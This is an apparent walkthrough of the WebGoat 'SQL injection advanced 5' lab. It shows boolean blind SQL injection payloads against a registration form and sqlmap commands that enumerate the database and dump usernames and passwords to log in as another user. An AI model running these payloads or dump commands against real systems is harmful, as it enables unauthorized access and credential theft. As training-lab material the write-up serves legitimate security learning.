This lessons is asking us to determine how the login/register form is vulnerable to Blind SQLi and to exploit the vulnerability in order to login as Tom
So I went in with some straightforward tests on the ‘username’ text field on the login form
tom' AND '1'='1
Tom' AND '1'='1
admin' AND '1'='1
...But these were not successful.
Since there also is a registration form, I then created a user and tried to login with it.
As both the registration and the login worked fine with the new user, I can assume that both the form values I sent over for these two operations where resulting in valid SQL queries.
So what happen if I try to send them again with some attached SQLi test?
newuser' AND '1'='1
From this response I understand that the app is checking if the username already exists by running the query we provided, thus this statement is a valid TRUE statement since the username already exists
newuser' and '1'='2
Hence this is a valid FALSE statement.
This is all we need to ask the database for all its data, as long as the db user is allowed to read them.
In lesson #4 we were given a hint on this problem
AND substring(database_version(),1,1) = '2By varying the position argument for substring() and the literal value we can then loop through all positions and see what matches, we can find subsequent character positions of the database values by using Burp Intruder, this can be done by using a sniper attack on the §2§ with a list such as https://github.com/xmendez/wfuzz/blob/master/wordlist/stress/alphanum_case_extra.txt and see what request returns a TRUE statement
The database value is 2.5.0 on my WebGoat install
I then wanted to automate with sqlmap and see what I could get from the db.
The simplest way I know in order to give sqlmap a proper request is to
- submit the initial request and get the response for a TRUE statement from the browser
- copy them from Burp
- use the request as input file and the response as string parameter for the TRUE statement in sqlmap
sqlmap -r request.txt --string "please try to register with a different username" -p username_reg --threads 1
Then we try to get the db used by our query
sqlmap -r request.txt --string "please try to register with a different username" -p username_reg --threads 1 --dbms="HSQLDB" --current-db
Let’s try to get the table names
sqlmap -r request.txt --string "please try to register with a different username" -p username_reg --thread=10 --technique=B --dbms="HSQLDB" -D PUBLIC --tables --level=5 --risk=3
I would then start by looking at the CHALLENGE_USERS table
sqlmap -r request.txt --string "please try to register with a different username" -p username_reg --thread=1 --technique=B --dbms="HSQLDB" -D PUBLIC -T CHALLENGE_USERS --columns --level=5 --risk=3
And get the table rows, this time I have to lower the number of threads due to the number or errors I was getting with 10 threads on my machine
sqlmap -r request.txt --string "please try to register with a different username" -p username_reg --thread=1 --technique=B --dbms="HSQLDB" -D PUBLIC -T CHALLENGE_USERS -C userid,password --dump --level=5 --risk=3
Now we have username and password for Tom and can login on the lesson login form
This concludes WebGoal SQL injection advanced 5
I hope you liked it
PVXs — https://twitter.com/pivixih
